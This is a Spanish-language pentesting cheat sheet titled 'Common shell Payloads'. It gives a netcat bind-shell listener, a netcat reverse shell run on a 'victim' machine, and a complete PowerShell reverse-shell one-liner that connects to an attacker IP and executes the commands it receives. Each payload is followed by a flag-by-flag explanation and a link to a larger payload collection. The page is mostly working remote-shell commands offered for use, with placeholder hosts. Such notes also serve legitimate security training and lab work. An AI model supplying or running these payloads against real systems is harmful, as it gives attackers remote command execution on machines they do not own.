Common shell Payloads

Create a listener for a bind shell

Listener:

mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

¿Qué hace este comando?

Este comando se ejecuta en tu máquina atacante y crea un listener con nc (Netcat) esperando conexiones entrantes. El shell que recibe se maneja con un archivo FIFO (pipe nombrado).

📌 Parámetros

mkfifo /tmp/f
- Crea un FIFO (named pipe) llamado /tmp/f. Sirve como canal de entrada/salida para redirigir datos.
nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1
- nc: Ejecuta Netcat.
- -l: Escucha.
- -v: Modo verbose.
- -n: No intenta hacer DNS lookup.
- -p <PORT>: Puerto donde se escucha.
- < /tmp/f: Usa el FIFO como entrada estándar.
- | /bin/sh: La entrada del FIFO se interpreta como comandos de shell.
- >/tmp/f 2>&1: La salida (stdout y stderr) se escribe en el FIFO.
- Así se logra una conexión interactiva de shell.
rm /tmp/f
- Limpia el archivo FIFO una vez que se cierra la conexión

Reverse shell:

mkfifo /tmp/f; nc <IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

¿Qué hace este comando?

Este se ejecuta en la máquina víctima. Establece una conexión hacia tu máquina (tu IP y puerto) y redirige un shell usando un FIFO.

📌 Parámetros

Diferencias clave:

Cambia nc -lvnp <PORT> (modo escucha) por nc <LOCAL-IP> <PORT> (modo cliente).
<LOCAL-IP> es la IP de tu máquina atacante, donde estás escuchando con Netcat.
Sirve para enviar una reverse shell desde la víctima a tu listener.

Reverse shell con PowerShell en Windows

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

¿Qué hace este comando?

Este es un reverse shell en PowerShell para sistemas Windows. Se conecta a tu IP y puerto, recibe comandos, los ejecuta en PowerShell, y devuelve la salida.

Los valores <ip> y <port> son los que debemos setear con nuestros datos de nuestra máquina atacante

📌 Parámetros

TCPClient:
- New-Object System.Net.Sockets.TCPClient('<ip>',<port>) establece una conexión hacia tu máquina atacante.
Canal de comunicación:
- Usa $stream = $client.GetStream() para leer y escribir datos por el socket.
Lectura de comandos:
- Lee datos entrantes en un bucle con $stream.Read(...), y los decodifica con ASCIIEncoding.
Ejecución de comandos:
- Usa iex $data para ejecutar el comando recibido.
Respuesta al atacante:
- Captura la salida con Out-String, la codifica en bytes y la escribe de vuelta en el stream.
Cierre:
- Cuando se termina la conexión, cierra el socket con $client.Close().

Para ver más payloads sobre reverse shell visitar: Payloads All The Things

Last updated 7 months ago